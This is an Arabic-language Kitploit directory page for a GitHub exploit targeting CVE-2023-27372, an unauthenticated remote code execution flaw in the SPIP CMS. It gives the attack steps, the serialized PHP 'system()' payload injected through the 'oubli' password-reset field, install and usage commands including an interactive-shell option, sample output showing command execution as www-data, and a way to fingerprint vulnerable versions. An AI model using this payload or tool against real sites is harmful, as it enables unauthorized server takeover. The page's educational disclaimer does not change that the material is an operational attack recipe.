Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/scriniariii/cve-2023-27372
تحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubscriniariii/cve-2023-27372

CVE-2023-27372

استغلال ثغرة CVE-2023-27372 مع شل تفاعلية

عرض المستودع
1منذ 5 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

استغلال ثغرة CVE-2023-27372

استغلال لثغرة CVE-2023-27372، وهي ثغرة تنفيذ تعليمات برمجية عن بُعد غير مصادق عليها في نظام إدارة المحتوى SPIP تؤثر على الإصدارات السابقة لـ 4.2.1.

⚠️ لأغراض تعليمية فقط. استخدمها حصرًا على الأنظمة التي تملكها أو لديك إذن كتابي صريح لاختبارها. الاستخدام غير المصرح به غير قانوني.


نظرة عامة

SPIP هو نظام إدارة محتوى مفتوح المصدر يُستخدم على نطاق واسع في النشر على الويب. توجد هذه الثغرة في نموذج استعادة كلمة المرور (/spip.php?page=spip_pass)، حيث تتم معالجة المعامل oubli دون تعقيم مناسب، مما يسمح للمهاجم بحقن وتنفيذ كود PHP عشوائي على الخادم — دون الحاجة إلى مصادقة.

الحقلالتفاصيل
CVECVE-2023-27372
درجة CVSS9.8 (حرجة)
متجه الهجومالشبكة
المصادقةغير مطلوبة
الإصدارات المتأثرةSPIP < 4.2.1
نوع الثغرةحقن كود / تنفيذ أوامر عن بُعد غير مصادق عليه

آلية العمل

  1. جلب رمز CSRF — يتم إرسال طلب GET إلى /spip.php?page=spip_pass لاستخراج رمز formulaire_action_args من نموذج HTML.

  2. بناء الحمولة — يتم إنشاء سلسلة PHP متسلسلة تحتوي على الأمر المراد تنفيذه:

    root@kitploit:~
    s:N:"<?php system('COMMAND'); ?>";
    

    حيث N هو الطول الدقيق بالبايت للسلسلة PHP الداخلية.

  3. إرسال الحمولة — يتم إرسال طلب POST مع الحمولة المصممة في حقل oubli إلى جانب رمز CSRF. يقوم SPIP بمعالجة هذا الحقل دون تعقيم وينفذ كود PHP المحقون.

  4. استخراج المخرجات — يتم إرجاع مخرجات الأمر داخل استجابة HTML ويتم تحليلها من سمة value لحقل الإدخال oubli.

المتطلبات

  • Python 3.x
  • requests
  • beautifulsoup4
  • argparse
  • regex

التثبيت

root@kitploit:~

git clone https://github.com/scriniarii/CVE-2023-27372

cd CVE-2023-27372

pip install requests beautifulsoup4

الاستخدام

root@kitploit:~
python3 exploit.py -u <URL> -c <command>
الوسيطالوصف
-u, --urlعنوان URL الأساسي لمثيل SPIP المستهدف
-c, --commandأمر نظام التشغيل المراد تنفيذه على الهدف
-s, --shellشيل تفاعلي

مثال

root@kitploit:~

python3 exploit.py -u http://TARGET/ -c "id"
root@kitploit:~

python3 exploit.py -u http://TARGET/ -s

المخرجات المتوقعة:

root@kitploit:~
[+] Token found : JWDCxt5PTFzhPb...
 
[+] Output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)

الإصدارات المتأثرة

للتحقق من إصدار SPIP لهدف، ابحث عن وسم meta generator في HTML:

root@kitploit:~
<meta name="generator" content="SPIP 4.2.0" />

[!CAUTION]
⚠️ إخلاء مسؤولية
يُرجى استخدام المعلومات والاستغلالات المقدمة في مستودعاتي للأغراض التعليمية والإفصاح المسؤول فقط. لست مسؤولاً عن أي استخدام خاطئ أو ضرر ناتج عن استخدام هذه الأدوات أو البرامج النصية أو الاستغلالات.

تنزيل الأداة